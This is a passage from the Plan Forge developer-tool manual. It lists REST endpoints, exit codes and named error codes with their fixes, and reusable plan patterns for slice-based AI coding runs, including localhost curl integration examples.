| GET | /api/deploy-journal | List deploys | Version, deployer, notes, linked run. |
| POST | /api/deploy-journal | Record a deploy | Body: { version, deployer, notes, runIdx? }. |
| POST | /api/regression-guard | Run regression gates against codebase | Body: { scope, baseline? }. Returns pass/fail per rule. |
| GET | /api/runbooks | List operational runbooks | One per alert class. |
| POST | /api/runbook | Generate or update a runbook | Body: { alertClass, content }. |
| GET | /api/health-trend | Health DNA aggregator | Drift + cost + incidents + test pass-rate over time. |
| GET | /api/hotspots | Git churn hotspots | Files with high change frequency, refactor candidates. |
| GET | /api/triage | Prioritized alert list | Drift + incidents + secrets + deps, ranked. |
| GET | /api/liveguard/traces | LiveGuard execution traces | One per forge_liveguard_run invocation. |
| GET | /api/secret-scan | Latest secret-scan results | Values redacted; returns { findings: [{ file, line, severity }] }. |
| POST | /api/secret-scan/run | Trigger a fresh scan | Body: { paths? }. Default scans full repo. |
| GET | /api/deps/watch | Latest dependency-vuln snapshot | Returns CVE list grouped by package. |
| POST | /api/deps/watch/run | Trigger a fresh dep scan | Body: { packageManager? }; auto-detects if omitted. |
| GET | /api/env/diff | Env-var key divergence across .env files | Catches the "key in dev but missing in prod" footgun. |
The bridge between LiveGuard findings and structured remediation. Quorum prompts gather context across drift/incident/deploy/secret findings; fix proposals materialize that context into an actionable plan slice.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/fix/proposals | List fix proposals | Sorted by recency; filter by ?status=. |
| POST | /api/fix/propose | Generate an actionable fix plan | Body: { findingId, model? }. Returns proposed plan-slice diff. |
| GET | /api/quorum/prompt | Read XSS-validated quorum prompt | Query: ?promptId=. Output is HTML-escaped for safe rendering. |
| POST | /api/quorum/prompt | Build a quorum prompt | Body: { findings: [...], mode }. Returns { promptId, url }. |
The bug-registry surface. Tempering scans for TODO/FIXME/stub markers and produces an artifact; the bug stub endpoint converts a finding into a registered bug. Bug create/update/validate is MCP-only; see Appendix Q.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/tempering/artifact | Latest tempering artifact | Scan results + temper score. |
| POST | /api/tempering/bug-stub | Create a bug stub from a finding | Body: { findingId, title? severity? }. |
| GET | /api/bugs/list | List registered bugs | Query: ?status=&severity=&plan=. |
Auto-skills surface decisions that the orchestrator wants a human to make, tag the deferred work, accept/reject the proposal, or defer for later review.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/skills | Skill catalog | Includes hand-authored .github/skills/*/SKILL.md and auto-skills. |
| GET | /api/skills/pending | Pending decisions awaiting accept/reject | Query: ?source=. |
| POST | /api/skills/accept | Accept a pending decision | Body: { decisionId, note? }. |
| POST | /api/skills/reject | Reject a pending decision | Body: { decisionId, reason? }. |
| POST | /api/skills/defer | Defer a pending decision | Body: { decisionId, untilTimestamp? }. |
The self-improvement surface. Inner-loop subsystems observe runs and propose tightenings: gate suggestions from observed failures, reviewer-score calibration, cost-anomaly detection, federation across sibling repos.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/innerloop/status | All inner-loop subsystem states | Returns rollup of the six subsystems below. |
| GET | /api/innerloop/reviewer-calibration | Reviewer-score calibration trace | Drift between auto-reviewer and human override decisions. |
| GET | /api/innerloop/gate-suggestions | Gate-tightening suggestions | Patterns where current gates allowed regressions. |
| GET | /api/innerloop/cost-anomalies | Cost anomalies across runs | Slices that cost >3σ above their plan baseline. |
| GET | /api/innerloop/proposed-fixes | Auto-proposed fixes from health-trend signals | Combines drift, incidents, and test trends. |
| GET | /api/innerloop/federation | Federation-mode status | Advisory cross-repo learning when configured. |
| POST | /api/innerloop/federation/toggle | Enable/disable federation | Body: { enabled }. |
The human-in-the-loop surface. When a plan slice is flagged for approval (assisted mode or escalation), the orchestrator emits an approval-requested event and waits. The browser-link variant is opened by VS Code notification; the POST variant is for programmatic clients.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/bridge/status | Pending approvals waiting for a human nudge | Returns { pending: [{ runId, sliceId, reason, createdAt }] }. |
| POST | /api/bridge/approve/:runId | Programmatic approval | Header X-Bridge-Token required (HMAC from PFORGE_BRIDGE_SECRET). Body: { decision: "approve"|"reject", note? }. |
| GET | /api/bridge/approve/:runId | Browser-link approval | Query ?token= with same HMAC; renders a confirm page. Used by VS Code notification & email links. |
PFORGE_BRIDGE_SECRET in your environment (see Appendix U) before enabling assisted runs. Approvals without a valid token return 401 BRIDGE_TOKEN_INVALID.
The surface that powers the Copilot Integration Trilogy, reading, previewing, and syncing .github/copilot-instructions.md from the project profile + principles. OpenClaw endpoints post LiveGuard snapshots to the optional analytics service.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/copilot-instructions | Read current file | Returns raw markdown. |
| POST | /api/copilot-instructions/preview | Preview a regenerated file | Body: { projectProfile? principles? }. Non-destructive. |
| POST | /api/copilot-instructions/sync | Sync from project profile + principles | Writes the file; emits a hub event for editor refresh. |
| POST | /api/openclaw/snapshot | Post a LiveGuard snapshot to OpenClaw | Body: snapshot envelope. Requires openclaw.endpoint in .forge.json. |
| GET | /api/openclaw/config | OpenClaw endpoint + auth config | Token is masked in response. |
Team-mode endpoints that wrap the gh CLI for read-only GitHub access plus a per-operator activity feed sourced from .forge/team-activity.jsonl.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/github-metrics | Live GitHub repo metrics | PRs open, stale branches, issue load. Requires gh auth login. |
| GET | /api/github-readiness | Readiness for Copilot Coding Agent dispatch | Validates labels, branch protection, repo settings. |
| GET | /api/team-dashboard | Per-operator stats + conflict risk | Aggregates team-activity.jsonl. |
| GET | /api/team-activity | Recent run summaries from team feed | Cursor-paged: ?cursor=&limit=. |
The "everything else" administrative surface, notification channels, audit drain loop, dashboard state persistence, config + secrets read/write, extensions, update checks, soft restart.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/notifications/config | Notification channel config | Slack, Teams, PagerDuty, Email per .forge.json. |
| POST | /api/notifications/config | Update channels | Body: partial config; deep-merged. |
| GET | /api/audit/config | Audit drain loop config | Returns drain interval, ring sizes, destinations. |
| PUT | /api/audit/config | Update audit config | Full replacement of audit subtree. |
| POST | /api/audit/drain | Trigger one full drain pass | Useful before shutdown. |
| GET | /api/dashboard-state | Sticky dashboard tab + filter state | Per-user UI prefs. |
| POST | /api/dashboard-state | Persist dashboard state | Body: { tab, filters, layout }. |
| GET | /api/config | Read merged .forge.json | After env-var overlay and computed defaults. |
| POST | /api/config | Update config | Body: partial; deep-merged. Writes .forge.json. |
| GET | /api/secrets | Read .forge/secrets.json keys | Values masked; only key presence returned. |
| POST | /api/secrets | Update local secrets store | Body: { key, value }. Writes the gitignored file. |
| GET | /api/extensions | Installed extensions | From .forge/extensions/. |
| GET | /api/update-status | Update-check status | Latest release, currency, channel. |
| POST | /api/self-update | Trigger self-update install | Runs pforge self-update; restart required afterward. |
| POST | /api/server/restart | Soft-restart the MCP server | HMR-friendly: re-loads code without dropping the WebSocket clients (best-effort). |
The escape hatch. Any of the 106 MCP tools can be invoked over REST through this surface, useful for SDK clients, CI scripts, and any external integration that needs richer tool semantics than the first-class endpoints expose.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/tool/:name | Invoke any of the 106 MCP tools over REST | Body is the tool's input contract (see Appendix Q). Response is the tool's output payload, unwrapped from the MCP envelope. Crucible and Forge-Master tools route through the MCP handler (v2.82.1 fix). |
| POST | /api/tool/org-rules | Aliased convenience, forge_org_rules | Equivalent to POST /api/tool/forge_org_rules. |
| POST | /api/tool/run-plan | Aliased convenience, forge_run_plan | Equivalent to POST /api/tool/forge_run_plan; also surfaced as /api/runs/trigger with a friendlier shape. |
POST /api/runs/trigger and POST /api/tool/forge_run_plan), prefer the first-class endpoint, its response shape is tailored for direct rendering and skips the MCP envelope. Use the dispatcher when the tool has no first-class equivalent (most estimation, bug, and lattice tools).
The HTTP surface for the conversational classifier described in the Forge-Master chapter. Lives alongside the main API on the same port; chat sessions are persistent and resumable.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/forge-master/capabilities | Classifier + tool surface metadata | What Forge-Master can do. |
| GET | /api/forge-master/prompts | Suggested starter prompts | Surfaced by the dashboard chat panel. |
| GET | /api/forge-master/sessions | List active chat sessions | Returns { sessions: [{ id, summary, lastTurnAt }] }. |
| GET | /api/forge-master/session/:id | Fetch one session | Full turn history. |
| POST | /api/forge-master/chat | Start a chat or send a turn | Body: { sessionId? message }. Returns { sessionId, response }. |
| GET | /api/forge-master/chat/:sessionId/stream | Server-Sent Events stream of a turn | For incremental rendering. |
| POST | /api/forge-master/chat/:sessionId/approve | Approve a Forge-Master tool call | For tools requiring human approval (e.g. write actions). |
| GET | /api/forge-master/prefs | Read user preferences | Tone, verbosity, classifier mode. |
| PUT | /api/forge-master/prefs | Update preferences | Body: partial prefs. |
| GET | /api/forge-master/cache-stats | Embedding cache liveliness | Hit rate, useful as a Forge-Master health probe. |
The single image-generation endpoint. Routes to xAI Grok Aurora (if XAI_API_KEY is set) or OpenAI DALL-E (if OPENAI_API_KEY is set). Auto-detects the available provider.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/image/generate | Generate an image | Body: { prompt, size? count? provider? }. Returns { images: [{ url, b64? }] }. |
Five short recipes that cover the most common external-integration patterns. All examples assume the server is running at http://127.0.0.1:3100.
curl -X POST http://127.0.0.1:3100/api/runs/trigger \
-H 'Content-Type: application/json' \
-d '{
"plan": "docs/plans/Phase-28-PLAN.md",
"mode": "auto",
"quorum": "auto"
}'
# Returns: { "runIdx": 47, "pid": 18432 }
wscatwscat -c ws://127.0.0.1:3100/api/hub
> {"type":"hello"}
< {"version":1,"type":"connected","timestamp":"2025-06-15T12:34:56.789Z","source":"hub"}
< {"version":1,"type":"slice-started","timestamp":"...","source":"orchestrator", ...}
Full event catalog in Appendix V.
curl 'http://127.0.0.1:3100/api/search?query=anvil+cache&source=memory&limit=10'
# Returns the gold-standard ACI shape:
# {
# "hits": [ { source, recordRef, snippet, score, timestamp } ],
# "total": 27,
# "truncated": true,
# "message": "Showing 10 of 27 hits across source=memory."
# }
curl -X POST http://127.0.0.1:3100/api/tool/forge_estimate_quorum \
-H 'Content-Type: application/json' \
-d '{ "plan": "docs/plans/Phase-28-PLAN.md" }'
# Returns the tool's output payload unwrapped from the MCP envelope:
# { "modes": { "auto": {...}, "power": {...}, "speed": {...}, "false": {...} } }
# VS Code notification or email link contains:
# https://127.0.0.1:3100/api/bridge/approve/47?token=<HMAC>
#
# Clicking opens a confirm page that POSTs back with the decision.
# Programmatic equivalent:
curl -X POST http://127.0.0.1:3100/api/bridge/approve/47 \
-H 'Content-Type: application/json' \
-H 'X-Bridge-Token: <HMAC>' \
-d '{ "decision": "approve", "note": "Looks good, ship it" }'
The pforge-sdk wraps the REST API with typed helpers. Prefer it when integrating from JavaScript/TypeScript:
import { client } from 'pforge-sdk';
const c = client({ baseUrl: 'http://127.0.0.1:3100' });
const runs = await c.get('/api/runs/latest');
const estimate = await c.callTool('forge_estimate_quorum', {
plan: 'docs/plans/Phase-28-PLAN.md',
});
/api/hub.forge.json Reference, configuration keys that several endpoints read or writePLAN_FORGE_HTTP_PORT, PFORGE_BRIDGE_SECRET, provider keyshttp://127.0.0.1:3100/dashboardnode scripts/dump-rest-routes.mjs)
The complete contract for every exit code, named error code, and error event Plan Forge emits, pforge CLI, the run-plan orchestrator, MCP tool responses, REST status shapes, and OS-level subprocess signals. The reference CI scripts and on-call runbooks depend on.
Plan Forge exits and errors come from four layers, each with its own conventions:
| Layer | What it returns | Where the codes live |
|---|---|---|
pforge CLI | POSIX exit codes 0 / 1 / 2 | § CLI exit codes |
pforge run-plan orchestrator | POSIX exit codes 0 / 1 + structured statusReason | § Orchestrator exit codes |
MCP tools (forge_*) | JSON envelope with { ok, code, error } | § MCP tool errors |
REST API (POST /api/…) | HTTP status (400/404/409/429/500) + JSON { error, code? } | § REST error shape |
| OS subprocess signals (worker, gate) | Native exit codes, including 0xC000013A Ctrl+C | § OS subprocess exits |
pforge)The pforge launcher (pforge.ps1 on Windows, pforge.sh on POSIX) uses a deliberately small surface so wrappers stay simple. Anything that's not a true failure exits 0; true failures exit 1; only special cases use 2.
| Code | Meaning | When you see it |
|---|---|---|
0 | Success. The command completed and produced its intended side effect. May still emit warnings on stderr. | Every happy path. Also includes nothing-to-do states (e.g. pforge release-notes in a repo without a roadmap). |
1 | Generic failure. A subcommand failed, validation rejected input, or an external tool (git, node, network) errored. | Most error paths. Examples: missing .forge.json, validate found problems, self-update couldn't fetch a release, audit drain aborted, setup couldn't reach the template repo. |
2 | Environment-level refusal. Plan Forge cannot run at all because a prerequisite is wrong or the action is intentionally blocked. | Three cases today: (1) pforge invoked outside a git repository; (2) pforge self-update when the GitHub update check itself failed (not a stale version, a network failure that prevents confirming you're current); (3) pforge audit when no scanners ran and the tempering config is empty or misconfigured. |
pforge run-plan)The orchestrator (pforge-mcp/orchestrator.mjs) is the long-running process that drives a plan slice-by-slice. Its exit code reflects the overall plan status, and a structured statusReason in the final JSON output narrows down why.
| Code | Plan status | Meaning |
|---|---|---|
0 | completed | Every slice passed its validation gate, the completeness sweep was clean, the Review Gate (if configured) approved, and the final commit landed. |
0 | completed-with-warnings | Plan landed but the audit-loop or post-deploy hook surfaced advisories. Treat as success in CI but post the warnings to the run log. |
1 | failed | A slice's validation gate failed after exhausting retries / escalation, a forbidden-action hook fired, the Review Gate rejected, or an LLM call errored without a recoverable path. statusReason contains the precise reason. |
1 | aborted | The user pressed Ctrl+C, an extension's preDeploy hook returned blocked: true, or --strict-gates rejected a plan that would otherwise have escalated. Run state is preserved at .forge/runs/<runId>/ for --resume-from. |
err.exitCode | failed | If an internal error throws with a numeric exitCode property, the orchestrator propagates that value. Used by the workers to surface specific failures like git is in a detached HEAD (no defined code today, reserved for future use). |
statusReason values| Reason | What it means |
|---|---|
gate-failed | The slice's bash validation gate exited non-zero after retries / escalation. |
worker-failed | The worker process (the LLM call) returned an error envelope, e.g. API timeout, rate-limit-exhausted, model refused. |
worker-signaled | The worker process was killed by a signal. On Windows the native code 0xC000013A (STATUS_CONTROL_C_EXIT) maps here. See § OS subprocess exits. |
drift-detected | The PreToolUse hook caught the worker editing a file listed in the plan's Forbidden Actions. |
review-rejected | The Review Gate (Session 3) explicitly rejected the slice. The reviewer's notes are at .forge/runs/<runId>/review-slice-<N>.md. |
escalation-exhausted | All models in the escalation chain failed. Try a different model with --model or split the slice. |
quorum-all-failed | Quorum mode: every model in the panel timed out or errored. See QUORUM_ALL_FAILED in the named error catalog. |
preDeploy-blocked | A LiveGuard preDeploy hook returned severity ≥ high, usually forge_secret_scan finding a secret or forge_env_diff finding an unauthorized variable. |
manual-import-rejected | --strict-gates with a hand-authored plan that lacks a crucibleId: frontmatter and was not invoked with --manual-import. |
forge_*)MCP tools never crash the server, they return a structured envelope. The contract is:
// Success
{ "ok": true, "…": "tool-specific payload" }
// Failure
{ "ok": false, "code": "NAMED_ERROR_CODE", "error": "Human-readable message", "details": { /* optional */ } }
Callers should branch on code, not on the message text (messages are wording-stable but not API-stable). The full catalog lives in § Named error catalog; the most common are:
| Code | Tool | Cause |
|---|---|---|
NO_REASONING_MODEL | forge_master_ask | No model configured and no provider API key detected. |
CRITICAL_FIELDS_MISSING | forge_crucible_finalize | Smelt blocked, the draft plan is missing one of: build-command, test-command, scope, gates, forbidden-actions, rollback. |
PLAN_ALREADY_EXISTS | forge_crucible_finalize | Refused to overwrite an existing hand-authored plan. Pass overwrite: true if intentional. |
ASK_QUESTION_MISMATCH | forge_crucible_ask | Client passed a stale questionId. Re-fetch state with forge_crucible_preview. |
QUORUM_ALL_FAILED | forge_quorum_analyze, forge_diagnose | Every model in the panel timed out (60s each) or errored. |
NO_API_KEY | Any provider-bound tool | Required env var (e.g. XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY) is unset and no secret file fallback found. |
PLAN_NOT_FOUND | forge_run_plan, forge_plan_status | The plan file path does not exist or is outside the workspace. |
PLAN_PARSE_ERROR | forge_run_plan, forge_validate | The plan file is missing required sections (e.g. ## Execution Slices) or has malformed slice headers. |
ERR_UPDATE_DURING_RUN | forge_self_update | Refused to self-update while a plan run is in flight. Wait for the run or abort it. |
The REST surface (Appendix W) uses standard HTTP status codes plus a JSON body. The body is always the same shape:
{ "error": "Human-readable message",
"code": "NAMED_ERROR_CODE", // optional, when a stable code applies
"retryAfterMs": 30000 // only on 429 }
| Status | Meaning | When |
|---|---|---|
200 | OK | Request completed. Body is the tool-specific payload. |
400 | Bad request | Missing or malformed body fields. Example: POST /api/audit/lookup without sha256Prefix. |
404 | Not found | Resource doesn't exist. Example: GET /api/plan/status/{runId} with an unknown run id, or POST /api/audit/lookup with a sha256 prefix that doesn't resolve. |
409 | Conflict | State prevents the action. Example: POST /api/self-update while a plan run is in flight returns { "code": "ERR_UPDATE_DURING_RUN" }. |
429 | Rate limited | Server-side rate limit hit. Body includes retryAfterMs. Bridge to Retry-After header in your client. |
500 | Internal error | Uncaught exception in the handler. The message is the JS err.message; err.stack is logged server-side but never returned. Treat as retry once, then page. |
WWW-Authenticate, Retry-After, or Content-Location. Clients should derive equivalents from the JSON body (retryAfterMs → Retry-After: ms÷1000). See Appendix W — Error shape for the full discussion.
The orchestrator spawns worker processes (the LLM call) and gate processes (bash commands). When these are killed by a signal, the native exit code is preserved and mapped through:
| Code | Platform | Meaning |
|---|---|---|
0xC000013A (3221225786) | Windows | STATUS_CONTROL_C_EXIT, subprocess was killed by Ctrl+C or its parent. Mapped to statusReason: "worker-signaled". Was historically silently treated as success (bug #82-class); now correctly marked failed. |
130 | POSIX | Killed by SIGINT (Ctrl+C). Same handling as Windows Ctrl+C. |
137 | POSIX | Killed by SIGKILL (OOM kill, kernel terminator). Surfaces as statusReason: "worker-signaled" with signal: "SIGKILL" in the slice record. |
143 | POSIX | Killed by SIGTERM (graceful shutdown). Same handling. |
124 | POSIX | GNU timeout killed the command (gate exceeded its budget). |
process.exit(0) immediately after a fetch() on Windows can trip Assertion failed: !(handle->flags & UV_HANDLE_CLOSING) because undici keepalive sockets are still closing. The orchestrator uses process.exitCode = 0 on the success path of --analyze / --diagnose to avoid this. If you embed the orchestrator in your own Node process, do the same.
Every named error code Plan Forge emits, alphabetized. Codes are stable across releases; new failure modes get new codes rather than reusing existing ones.
| Code | Origin | Cause & fix |
|---|---|---|
ASK_QUESTION_MISMATCH | Crucible | Client passed a stale questionId to forge_crucible_ask. Re-fetch with forge_crucible_preview, then retry with the current question id. |
auditor-spawn-failed | Orchestrator / PostRun hook | PostRun auditor hook could not be spawned. Check forgeMaster.auditor.outputPath permissions and the selected model tier; the parent run still exits 0. |
CRITICAL_FIELDS_MISSING | Crucible finalize | Draft plan is missing build-command, test-command, scope, gates, forbidden-actions, or rollback. Call forge_crucible_preview for criticalGaps, then continue the interview. |
diff-classify-blocked | forge_diff_classify / PreCommit chain | The diff classifier returned blocked for one or more files. Revert or move out-of-scope changes, then retry the commit. |
DRIFT_DETECTED | PreToolUse hook | Worker tried to edit a file listed in the plan's Forbidden Actions. Revert the change, then re-run the slice. |
ERR_UPDATE_DURING_RUN | REST 409 | POST /api/self-update was rejected because a plan is currently running. Abort the run or wait for it to finish. |
GATE_COMMAND_FAILED | Orchestrator | Slice validation gate exited non-zero. Fix the build or test failure, then resume from the failed slice. |
lock-hash-mismatch | Orchestrator / PreCommit chain | The plan's lockHash no longer matches the current plan body. Re-harden the plan to regenerate lockHash, then retry. |
network-allowlist-violation | Orchestrator | Outbound call targeted a host outside network.allowed. Add the host to the allowlist or remove the outbound call. |
NO_API_KEY | Provider tools | No provider API key is configured. Set XAI_API_KEY, OPENAI_API_KEY, or ANTHROPIC_API_KEY, or use the zero-key Copilot path when supported. |
NO_REASONING_MODEL | Forge-Master | Forge-Master has no model configured and no provider key available. Set forgeMaster.reasoningModel or configure a provider key. |
observer-budget-exceeded | Observer daemon | Forge-Master Observer hit its daily USD cap or hourly narration cap. Wait for the budget window to reset or widen the cap in .forge.json. |
PLAN_ALREADY_EXISTS | Crucible finalize | Refused to overwrite an existing hand-authored plan. Read both files, then re-finalize with overwrite: true if you really mean it. |
PLAN_NOT_FOUND | forge_run_plan | Plan path doesn't exist or is outside the workspace. Verify the path and keep plans under docs/plans by convention. |
PLAN_PARSE_ERROR | forge_validate | Plan is missing required sections or has malformed slice headers. Run forge_validate to see the specific gap and repair it. |
QUORUM_ALL_FAILED | Quorum mode | All quorum models timed out or errored. Check API keys and network connectivity, then retry; consider --quorum=speed if flagship models are unavailable. |
RATE_LIMITED | REST 429 | Request was throttled. Honor retryAfter or the provider reset window before retrying. |
REVIEW_REJECTED | Review Gate | Session 3 reviewer rejected the slice. Read the review artifact, address the findings, then rerun the slice. |
SCOPE_VIOLATION | PreToolUse hook | Worker edited a path outside the allowed scope contract. Revert the change and rerun with the correct scope. |
STRICT_GATES_REJECTED | Orchestrator | Strict gates refused a plan that would otherwise have escalated. Drop --strict-gates or strengthen the failing gate. |
tool-denied | Orchestrator | A worker or hook tried to invoke an MCP tool listed in tools.deny. Remove the tool from the denylist or update the prompt to avoid it. |
WORKER_TIMEOUT | Orchestrator | Worker exceeded its per-slice execution budget. Split the slice or switch to a faster model. |
In addition to exit codes and named errors, the WebSocket hub broadcasts error-class events that the dashboard and external watchers consume. The full taxonomy lives in Appendix V — Errors & warnings; the most operationally relevant are:
| Event | Severity | What it signals |
|---|---|---|
slice-orphan-warning | warn | Failed slice's worker deliverables were staged but not committed. Recovery commands at .forge/runs/<runId>/orphans-slice-<N>.json. |
drift-detected | error | PreToolUse hook caught a forbidden-file edit. Plan run aborts. |
quorum-model-failed | warn | Individual model in a quorum panel timed out or errored. The panel proceeds with remaining responders unless threshold breaks. |
gate-retry-exhausted | error | Slice gate failed all retries. Orchestrator marks slice failed, exits 1. |
preDeploy-blocked | error | LiveGuard hook found a secret or unauthorized env var. Run aborts before the deploy slice executes. |
observer:budget-blocked | warn | Forge-Master Observer hit its daily cost cap or hourly narration cap. Narrations are silently skipped until the budget window resets. No impact on plan execution. |
The smallest useful contract for a CI gate:
# Bash: fail the build on any exit ≠ 0
set -euo pipefail
pforge run-plan docs/plans/Phase-NN.md
# Exit 0 here means "completed" or "completed-with-warnings", both safe to ship
If you need to distinguish soft warnings from hard failures:
# Bash: parse the final JSON
output=$(pforge run-plan docs/plans/Phase-NN.md --json)
status=$(echo "$output" | jq -r '.status')
case "$status" in
completed) echo "Clean."; exit 0 ;;
completed-with-warnings) echo "Advisories, review the run log."; exit 0 ;;
failed) reason=$(echo "$output" | jq -r '.statusReason'); echo "FAILED ($reason)"; exit 1 ;;
aborted) echo "ABORTED, preserved state at .forge/runs/$(echo "$output" | jq -r '.runId')/"; exit 2 ;;
*) echo "UNKNOWN STATUS: $status"; exit 1 ;;
esac
For PowerShell with explicit exit-code branching:
# PowerShell
pforge run-plan docs/plans/Phase-NN.md
switch ($LASTEXITCODE) {
0 { Write-Host "Plan completed" -ForegroundColor Green }
1 { Write-Host "Plan failed - check .forge/runs/" -ForegroundColor Red; exit 1 }
2 { Write-Host "Environment refusal - check pforge smith" -ForegroundColor Yellow; exit 2 }
default { Write-Host "Unknown exit code: $LASTEXITCODE" -ForegroundColor Magenta; exit $LASTEXITCODE }
}
NO_API_KEY and NO_REASONING_MODEL resolution..forge.json hooks, configures the LiveGuard preDeploy hook behind preDeploy-blocked.
A catalog of reusable plan archetypes. For each pattern: when to reach for it, the typical slice shape, the validation gate flavor, recommended quorum mode, and the failure modes the pattern is designed to avoid. Use this when starting a new plan and you want to skip thinking about structure from scratch.
forge_crucible_ask can also be asked "which plan pattern fits <task>?" and will return a pointer to the right section here.
| Pattern | When | Slices |
|---|---|---|
| P1 — Add an Entity | New domain object end-to-end (DB → service → API → UI) | 4–7 |
| P2 — Add an Endpoint | New REST / RPC route on existing entity | 2–3 |
| P3 — Add an External Integration | Wire up a third-party API (Stripe / SendGrid / S3 / etc.) | 4–5 |
| P4 — Refactor a Subsystem | Extract / split / rename module with multiple consumers | 3–6 (one per consumer) |
| P5 — Fix a Regression | Bug landed in a previous slice; need repro + fix + guard | 2–3 |
| P6 — Hotfix | Production incident, minimal-surface emergency change | 1–2 |
| P7 — Feature Flag Rollout | Risky change you want to ship dark, toggle on later | 4–5 |
| P8 — Data Migration | Schema change requiring backfill + verification | 4–6 |
| P9 — Dependency Upgrade | Breaking-change SDK / framework bump | 3–5 |
| P10 — Performance Fix | Profile-driven targeted optimization | 2–3 |
| P11 — Security Patch | CVE / vulnerability with minimal-surface fix | 2–3 |
| P12 — Documentation Phase | Multi-document writing pass (manual chapters, runbooks, API docs) | 1 per document |
| P13 — CI/CD Workflow Change | Modify GitHub Actions / pipelines / deploy automation | 1–2 + manual verify |
| P14 — Spike-Then-Build | Unfamiliar domain; need exploration before committing to a design | 1 spike + N build slices in a follow-up plan |
When: a new first-class noun in your domain that needs persistence, an API surface, and (often) a UI. The most common shape.
Slice shape (4–7 slices):
Gate flavor: each slice ends with the test command for its layer (vitest repository.test, vitest service.test, vitest controller.integration.test). The final slice runs the full sweep.
Quorum: auto. The slices are routine; power is overkill.
Failure modes avoided: collapsing layers (controller doing DB writes), missing the OpenAPI update, forgetting to wire the migration into the test setup.
When: a new route on an existing entity. No schema change, no UI.
Slice shape (2–3 slices):
Gate flavor: per-slice unit / integration test command. Final gate also runs the OpenAPI lint / contract diff.
Quorum: auto or disabled for trivial CRUD additions.
Failure modes avoided: route registered but not wired to service; OpenAPI drift from implementation.
When: bringing in Stripe, SendGrid, S3, Twilio, an internal RPC service, anywhere your code calls an outside system.
Slice shape (4–5 slices):
Gate flavor: unit tests use the fake; the real-adapter slice may have an opt-in SMOKE=1 guard that hits a sandbox.
Quorum: auto; bump to power for the retry/circuit-breaker slice if SLA-critical.
Failure modes avoided: timeouts not configured (hang forever), retries not idempotent-safe, secrets in source.
When: extracting a module, splitting a god-class, renaming a heavily-referenced symbol. Multiple consumers must update.
Slice shape (3–6 slices):
Gate flavor: per-consumer slice gates run that consumer's test file. Final slice runs the full sweep + a grep that asserts zero references to the old shape.
Quorum: auto. Per-consumer slices are mechanical; quorum doesn't help.
Failure modes avoided: big-bang rename that breaks the whole tree at once; consumer drift (one consumer left on the old shape).
When: a bug that worked before now doesn't. The previous slice that introduced it is identified.
Slice shape (2–3 slices, strict TDD):
Gate flavor: the red slice's gate must assert the test fails (e.g. vitest run regression.test 2>&1 | grep -q "1 failed"). The green slice's gate asserts it now passes.
Quorum: auto for green; disabled often fine for red.
Failure modes avoided: "fix" that doesn't actually fix; scope creep that buries the actual fix in unrelated changes.
When: production is broken; minutes matter; the change is small and reversible.
Slice shape (1–2 slices):
Gate flavor: fast (under 30s if possible). Skip the broad sweep; run only the affected test file. The completeness sweep can be deferred to a follow-up plan.
Quorum: disabled. Hotfix is about speed and reversibility, not consensus.
Failure modes avoided: bundling "improvements" into the hotfix (each line shipped is a line to roll back); over-validation while production burns.
Follow-up: file a P5 (Fix a Regression) plan once the fire is out, to add proper test coverage and address root cause.
When: a change risky enough to ship dark, new algorithm, vendor swap, UI redesign.
Slice shape (4–5 slices):
Gate flavor: tests must pass with flag both ON and OFF. The implementation slice's gate explicitly runs the suite twice with different env vars.
Quorum: power for the implementation slice (high blast radius); auto elsewhere.
Failure modes avoided: flag-on path untested; flag never cleaned up (becomes permanent technical debt).
When: a schema change requires moving / reshaping existing data, not just altering the schema.
Slice shape (4–6 slices):
Gate flavor: each slice's gate asserts the migration is idempotent (re-running it leaves the DB unchanged). Final slice's gate runs against a production-shape fixture.
Quorum: power for the migration, backfill, and remove-old slices (irreversible if wrong); auto elsewhere.
Failure modes avoided: irreversible migrations without a rollback path; backfills that lock production tables; reads switching before the data is fully migrated.
When: a major-version bump on a library / framework / SDK with breaking changes.
Slice shape (3–5 slices):
Gate flavor: each per-module slice's gate runs the test set for that module. Final slice's gate runs the full sweep.
Quorum: auto. Mechanical replacements; quorum adds little.
Failure modes avoided: trying to do all the fixes in one slice (un-reviewable diff); missing transitive breakage (final-sweep gate catches it).
When: profiling has identified a specific hotspot and you want to fix it without speculative changes.
Slice shape (2–3 slices):
Gate flavor: the fix slice's gate runs the benchmark and asserts the new number beats the baseline by the documented margin (e.g. node bench/users.bench.mjs | grep -E "throughput.*[5-9][0-9]{3}").
Quorum: auto. The hot loop is small; the change should be small.
Failure modes avoided: optimizing without measuring; broad refactors disguised as performance work.
When: a CVE in a dependency, a misconfiguration finding, or a discovered vulnerability in your own code.
Slice shape (2–3 slices):
Gate flavor: the fix slice's gate runs the regression test plus forge_secret_scan on the diff. PreDeploy LiveGuard hook applies if shipping to a deploy slice.
Quorum: auto or power, depends on blast radius.
Failure modes avoided: scope creep (fixing other things "while we're here"); regression test that doesn't actually exercise the vulnerable path.
See also Chapter 30 — Incident response.
When: writing several documents at once (manual chapters, runbooks, API docs) over multiple sessions.
Slice shape (1 per document):
node docs/manual/maintain.mjs).Gate flavor: validator runs twice consecutively, first pass detects drift, second pass confirms the auto-regeneration converged.
Quorum: auto. Doc writing is iterative; quorum doesn't help much.
Failure modes avoided: documents that reference each other but drift apart; orphan files not registered in indexes; bundled commits that touch many unrelated documents at once.
Real-world example: this manual's Phase-MANUAL-EBOOK-COMPLETION-PLAN.md is a literal P12 instance.
When: modifying GitHub Actions, deploy pipelines, or release automation. The change can't be fully tested locally.
Slice shape (1–2 slices + manual verify):
Gate flavor: local syntax check (e.g. actionlint .github/workflows/*.yml); the real verification happens by observing the next CI run on a branch.
Quorum: auto; bump to power if the change touches deploy gating.
Failure modes avoided: committing a broken workflow that bricks CI for the whole team; deploy steps that worked in the sandbox but fail in production.
When: unfamiliar domain, unclear design space. You need to learn before you commit.
